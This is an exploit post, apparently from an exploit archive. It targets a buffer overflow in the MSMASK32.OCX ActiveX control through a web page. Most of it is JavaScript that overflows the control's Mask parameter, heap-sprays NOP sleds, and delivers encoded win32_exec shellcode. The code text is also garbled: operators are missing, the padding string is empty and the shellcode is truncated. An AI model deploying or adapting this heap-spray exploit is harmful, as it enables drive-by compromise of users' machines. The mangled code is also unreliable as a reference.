Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi
Original POC: ( Not by me ) My first ActiveX exploit, learned quite a bit playing with this one.
Heaps are handy. #################################################
Loaded File: C:WINDOWSsystem32MSMASK32.OCX
Name: MSMask
Version: 1.1
Class MaskEdBox
GUID: {C932BA85-4374-101B-A56C-00AA003668DC}
Number of Interfaces: 1
Default Interface: IMSMask
RegKey Safe for Script: False
RegKey Safe for Init: True
KillBitSet: False
gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years! <input language=JavaScript onclick=doIt() type=button value="Test Exploit">
<script language="JavaScript"> function doIt()
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf1 = '';
for (i=1;i<=1945;i ){buf1=buf1 unescape("");} // win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949"
// A read through "Heap Feng Shui in JavaScript" shed some
// much needed light on this topic for me. Thank you Alexander Sotirov.
var shellcodeSize = (shellcode.length * 2);
var spraySled = unescape("%u9090%u9090");
var heapAddress = 0x0c0c0c0c;
var heapBlockSize = 0x100000;
var spraySledSize = heapBlockSize - (shellcodeSize 1);
var heapBlocks = (heapAddress heapBlockSize)/heapBlockSize;
var x = new Array();
while (spraySled.length*2<spraySledSize)
spraySled = spraySled;
spraySled = spraySled.substring(0,spraySledSize/2);
for (i=0;i<heapBlocks;i )
x[i] = spraySled shellcode;
document.write(body buf1 body1);
} </script>